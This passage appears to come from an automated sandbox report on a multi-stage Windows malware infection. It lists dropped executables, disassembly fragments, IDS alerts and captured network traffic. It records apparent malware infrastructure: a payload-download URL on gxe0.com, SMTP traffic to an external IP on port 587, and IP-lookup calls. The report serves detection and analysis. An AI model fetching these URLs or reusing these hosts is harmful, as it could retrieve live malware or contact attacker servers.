                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then jmp 01217394h12_2_01217188
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then jmp 012178DCh12_2_01217688
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h12_2_01217E60
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then jmp 012178DCh12_2_01217643
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h12_2_01217E58
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 4x nop then jmp 05B2BCBDh18_2_05B2BA40

                      Networking

                      barindex
                      Source: Malware configuration extractorURLs: https://gxe0.com/yak/233_Wisrysxlfss
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B2E4B8 InternetCheckConnectionA,4_2_02B2E4B8
                      Source: global trafficTCP traffic: 192.168.2.5:49708 -> 51.195.88.199:587
                      Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                      Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                      Source: Joe Sandbox ViewIP Address: 198.252.105.91 198.252.105.91
                      Source: Joe Sandbox ViewIP Address: 51.195.88.199 51.195.88.199
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 198.252.105.91:443
                      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.5:49709
                      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.5:49908
                      Source: global trafficTCP traffic: 192.168.2.5:49708 -> 51.195.88.199:587
                      Source: global trafficHTTP traffic detected: GET /yak/233_Wisrysxlfss HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: gxe0.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /yak/233_Wisrysxlfss HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: gxe0.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: gxe0.com
                      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                      Source: global trafficDNS traffic detected: DNS query: s82.gocheapweb.com
                      Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz
                      Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                      Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                      Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                      Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                      Source: powershell.exe, 0000000D.00000002.2269568363.000000000584A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                      Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                      Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                      Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                      Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                      Source: powershell.exe, 0000000D.00000002.2257244398.0000000004935000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: neworigin.exe, 0000000B.00000002.2310705536.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2337075849.00000000029F3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2337075849.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2357786292.0000000006061000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2310705536.0000000000C8A000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2395156851.0000000000990000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2395156851.0000000000926000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2422352208.0000000002704000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2445989296.0000000005F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.i.lencr.org/0
                      Source: neworigin.exe, 0000000B.00000002.2310705536.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2337075849.00000000029F3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2337075849.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2357786292.0000000006061000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2310705536.0000000000C8A000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2395156851.0000000000990000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2395156851.0000000000926000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2422352208.0000000002704000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2445989296.0000000005F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.o.lencr.org0#
                      Source: neworigin.exe, 0000000B.00000002.2337075849.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2337075849.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2422352208.00000000026FC000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2422352208.0000000002891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s82.gocheapweb.com
                      Source: powershell.exe, 0000000D.00000002.2257244398.0000000004935000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: neworigin.exe, 0000000B.00000002.2337075849.0000000002971000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2257244398.00000000047E1000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2422352208.000000000268C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 0000000D.00000002.2257244398.0000000004935000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: powershell.exe, 0000000D.00000002.2257244398.0000000004935000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: x.exe, x.exe, 00000004.00000003.2063002452.000000007FAE0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2185356044.0000000002985000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.2062442463.0000000002990000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220018454.0000000020874000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2234539521.0000000021C30000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2253826982.000000007FCEF000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2176035692.000000000095A000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2235162223.0000000021E2F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220018454.00000000207F3000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 0000000A.00000000.2172730384.0000000000416000.00000002.00000001.01000000.00000007.sdmp, Wisrysxl.PIF, 00000018.00000002.2312849494.0000000002BD2000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000002440000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000000.2295133769.0000000000416000.00000002.00000001.01000000.00000007.sdmp, Wisrysxl.PIF, 0000001C.00000002.2394647640.0000000002A62000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000002440000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000000.2376277495.0000000000416000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.pmail.com
                      Source: neworigin.exe, 0000000B.00000002.2337075849.00000000029F3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2337075849.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2357786292.0000000006061000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2310705536.0000000000C8A000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2395156851.0000000000990000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2395156851.00000000009B8000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2395156851.0000000000926000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2422352208.0000000002704000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                      Source: neworigin.exe, 0000000B.00000002.2337075849.00000000029F3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2337075849.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2357786292.0000000006061000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000B.00000002.2310705536.0000000000C8A000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2395156851.0000000000990000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2395156851.00000000009B8000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2395156851.0000000000926000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2422352208.0000000002704000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                      Source: x.exe, 00000004.00000000.2059921926.0000000000401000.00000020.00000001.01000000.00000004.sdmp, x.exe, 00000004.00000002.2251749179.000000007F920000.00000004.00001000.00020000.00000000.sdmp, esentutl.exe, 00000008.00000003.2171156522.0000000005600000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000002310000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://yadelphi.ru
                      Source: x.exe, 00000004.00000000.2059921926.0000000000401000.00000020.00000001.01000000.00000004.sdmp, x.exe, 00000004.00000002.2251749179.000000007F920000.00000004.00001000.00020000.00000000.sdmp, esentutl.exe, 00000008.00000003.2171156522.0000000005600000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000002310000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://yadelphi.ruopen
                      Source: neworigin.exe, 0000000B.00000000.2176656166.0000000000542000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: powershell.exe, 0000000D.00000002.2257244398.00000000047E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                      Source: neworigin.exe, 0000000B.00000000.2176656166.0000000000542000.00000002.00000001.01000000.00000009.sdmp, neworigin.exe, 0000000B.00000002.2337075849.0000000002971000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2422352208.000000000268C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                      Source: neworigin.exe, 0000000B.00000002.2337075849.0000000002971000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2422352208.000000000268C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                      Source: neworigin.exe, 0000000B.00000002.2337075849.0000000002971000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2422352208.000000000268C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                      Source: powershell.exe, 0000000D.00000002.2269568363.000000000584A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 0000000D.00000002.2269568363.000000000584A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 0000000D.00000002.2269568363.000000000584A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 0000000D.00000002.2257244398.0000000004935000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: x.exe, 00000004.00000002.2176035692.00000000008FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/
                      Source: x.exe, 00000004.00000002.2220018454.00000000208FD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak/233_Wisrysx
                      Source: x.exe, 00000004.00000002.2220018454.0000000020913000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2176035692.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2176035692.0000000000903000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak/233_Wisrysxlfss
                      Source: x.exe, 00000004.00000002.2176035692.000000000088E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak/233_WisrysxlfssC
                      Source: x.exe, 00000004.00000002.2176035692.00000000008D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak/233_Wisrysxlfssexell
                      Source: x.exe, 00000004.00000002.2176035692.0000000000903000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com:443/yak/233_Wisrysxlfss
